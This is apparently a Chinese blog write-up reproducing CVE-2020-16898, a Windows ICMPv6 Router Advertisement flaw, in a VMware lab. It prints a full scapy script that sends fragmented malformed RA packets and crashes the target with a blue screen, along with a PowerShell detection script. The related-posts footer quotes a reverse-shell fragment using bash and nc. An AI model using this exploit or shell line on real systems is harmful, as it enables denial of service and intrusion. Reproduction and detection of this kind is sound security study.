漏洞复现 - CVE-2020-16898 微软TCP/IP远程执行代码漏洞

最新推荐文章于 2024-08-20 16:58:51 发布
最新推荐文章于 2024-08-20 16:58:51 发布
阅读量2k 收藏 4
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hsj_csdn/article/details/109138162
版权

前几天微软更新补丁中有个CVE-2020-16898,下面是摘抄的一段描述,

Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。

漏洞原理不是很懂,主要是记录下复现过程

一、环境

①网络环境开启ipv6支持。这里使用vmware,NAT出一个子网,并开启ipv6支持。

②选取一个受影响版本的windows10镜像,安装在虚拟机里,这里选取的是 1909版本,

并执行ipconfig,查看ipv6地址为

fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103

这里注意,受害机器的ipv6地址选取 “ipv6地址” 或 “临时ipv6地址”

③攻击机是能够和受害机器能够通信的

查看攻击机的ipv6地址,执行ipconfig,这里注意攻击机的ipv6地址选取 “本地链接的ipv6地址”,可以看到是 

fe80::501a:49b7:b7d:5362%12

④攻击机中的python环境是python3.7,安装了scapy依赖

二、payload

从外国大佬的博客里抄了一段payload,这段payload作用是构造特定ipv6数据包,发送给受害者机器,让受害机器蓝屏。

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103"
v6_src = "fe80::501a:49b7:b7d:5362%12"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8
pkt = ICMPv6ND_RA() / aaa / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

执行这个脚本,可以看到虚拟机被打蓝屏了。如下:

wireshark抓包看下,这些就是脚本发送的数据,

目测红框下的Router Advertisement是最核心的包,

三、检测

在github上找了个powershell脚本,可以检测windows10是否存在这个漏洞,大体看了下是基于版本和配置检测的,用powershell获取配置,如果开启了 基于RA的DNS配置(RFC6106),并且win10发行版本大于1707,就存在这个漏洞。

Function Get-IPv6InterfaceParams($interface)
{
    $Output = netsh int ipv6 sh interfaces interface=$interface
    $windows_version = Check_windows_version
    $release_id = Check_release_id



    $Object = New-Object -Type PSObject
    $Output | Where {$_ -match '^([^:]+):\s*(\S.*)$' } | Foreach {
        [int]$ParseResult = 0
        if ([int]::TryParse($Matches[2], [ref]$ParseResult))
        {
            $Value = $ParseResult
       }
        else
        {
            $Value = $Matches[2]
        }
        $Name = $Matches[1] -replace ' '
        $Object | Add-Member -Type NoteProperty -Name $Name -Value $Value
    }
    $filter = $Object | where '基于RA的DNS配置(RFC6106)' -eq enabled | Select-Object IfLuid,IfIndex,'基于RA的DNS配置(RFC6106)'
    #Write-Output $filter
    $interfs = $filter | Select-Object -ExpandProperty IfIndex
    if ($interfs -and $windows_version -like "*10*" -and $release_id -gt 1707) {
        Write-Host "Windows vulnerable version" $windows_version $release_id -BackgroundColor Red
        Write-Host "Vulnerable interface:" -BackgroundColor Red
        foreach ($interf in $interfs) {
            netsh int ipv6 sh int $interf
        }
    }else {
        "No Vulnerable interfaces"
    }
    
}


Function Check_release_id {
    $output = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId
    return $output
}

Function Check_windows_version {
    $output = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName
    return $output
}

$up_interfaces = Get-NetAdapter | where status -eq 'up' | Select-Object -ExpandProperty ifIndex

foreach ($interface in $up_interfaces) {
    Get-IPv6InterfaceParams($interface)    
}

 

四、参考

http://blog.pi3.com.pl/?p=780

https://github.com/CPO-EH/CVE-2020-16898_Checker

https://zhuanlan.zhihu.com/p/265755647

https://bbs.pediy.com/thread-262707.htm

tiaotiao97
关注
专栏目录
CVE-2020-16898 微软TCP IP远程执行代码漏洞复现
afei001
12-28 295
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞详情 5.漏洞复现 (1)获取目标主机IPV6 (2)对目标主机进行攻击 6.EXP利用代码 7.CVE-2020-16898检测 8.修复建议 (1)建议打上微软官方补丁 (2)临时解决办法 1.漏洞概述 2020年10月16日,360CERT监测到网上公开了漏洞的相关分析和Poc,该Poc可造成系统蓝屏奔溃(BSOD),并可能在短时间内出现攻击态势。CVE-2020-16898,又被称为“Bad Ne...
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 607
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
漏洞复现
qq_44813849的博客
07-19 5703
CMS漏洞复现 CMS是"Content Management System"的缩写,意为"内容管理系统"。 网站的开发者为了方便,制作了不同种类的CMS,可以加快网站开发的速度和减少开发的成本。 常见cms 环境搭建 CMS官网CMS 网站源码下载源码 下载好后放到本地WWW目录下,然后开启PHPstudy,在浏览器访问 点击我已阅读并继续。然后是环境检测,保存默认即可 接下来是参数配置,需要设...
Windows TCP/IP 远程代码执行漏洞CVE-2024-38063)分析与修复
最新发布
weixin_45408984的博客
08-20 1664
Windows TCP/IP 远程代码执行漏洞CVE-2024-38063)分析与修复
永恒之蓝 MS17-010 漏洞复现
Nobug_的博客
06-16 872
永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.
漏洞复现CVE-2017-10271)
PDblue的博客
03-27 9702
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
漏洞复现
热门推荐
内心不种满鲜花就会长满杂草
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞
曹振国的博客
07-26 2102
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。 Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
CVE-2021-24086 Windows系统TCP/IP拒绝服务漏洞复现
m0_56642842的博客
05-31 2013
简介 Windows IPv6协议栈存在一处拒绝服务漏洞,此漏洞的根本原因是IPv6的嵌套分片机制中,当尝试递归重组嵌套的分片时会计算内部有效载荷中包含的所有扩展标头,当重组扩展头约为0xffff字节的数据包时,在IPv6 ReassembleDatagram中发生的NULL指针取消引用,发生崩溃。 远程攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞可导致目标系统拒绝服务(蓝屏)。 漏洞影响系统版本 Windows 10 Version 20H2 for x64-based Systems
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),
Apache Unomi 远程代码执行漏洞(CVE-2020-13942)复现
ximo的博客
03-24 262
简介 Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。 漏洞描述 在Druid 0.20.0及更早版本中,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户提供的JavaScript
CSRF漏洞之——漏洞复现
wsnbbz的博客
03-04 3237
介绍 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的...
ssrf漏洞之——漏洞复现
wsnbbz的博客
03-04 3008
漏洞介绍 SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造url,由服务端对此url发起请求的一个安全漏洞漏洞原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 一般情况下,SSRF访问的目标...
宝塔漏洞复现
黑白的博客
09-06 1万+
声明 好好学习,天天向上 漏洞描述 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能 该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞 影响范围 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 复现过程 漏洞镜像可以用docker获取 先配置加速器(公
weblogic漏洞复现
weixin_74182283的博客
03-31 850
安装weblogic靶场环境已经提供,直接进行实操(weblogic是啥自行搜索)
OpenSSH命令注入漏洞CVE-2020-15778)复现
玄道的网安博客
09-17 1749
简介 OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。 影响版本 <= openssh-8.3p1 漏洞复现 查看版本 ssh -V 开启22端口服务 先在本地新建好文件,用于上传 本地监听 nc -lvvp 4444 payload scp 1.txt root@受害机ip:'`bash -i >& /dev/tc..
heartbleed漏洞复现
dys_ddnh的博客
12-22 343
heartbleed漏洞复现 参考链接 1、先换源 换源可参考 2、配置环境,安装docker、dockers-compose sudo apt-get install docker sudo apt-get install docker-compose 换docker源 添加文件 命令和文件信息如下(如果不进行这一步docker-compose up -d时可能会出错) vim /etc/docker/daemon.json { "registry-mirrors":["https://do
Git凭证泄露漏洞CVE-2020-5260)复现
thelostworld
05-16 521
一、漏洞描述Git使用凭证助手(credential helper)来帮助用户存储和检索凭证。但是当一个URL中包含经过编码的换行符时,可能将非预期的值注入到credential helper的协议流中。这将使恶意URL欺骗Git客户端去向攻击者发送主机凭据。当使用受影响版本 Git对恶意 URL 执行 git clone 命令时会触发该漏洞。二、相关版本情况受影响版本Git 2.17.x <= 2.17.3 Git 2.18.x <= 2.18.2 Git 2.19.x <= 2.19.
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值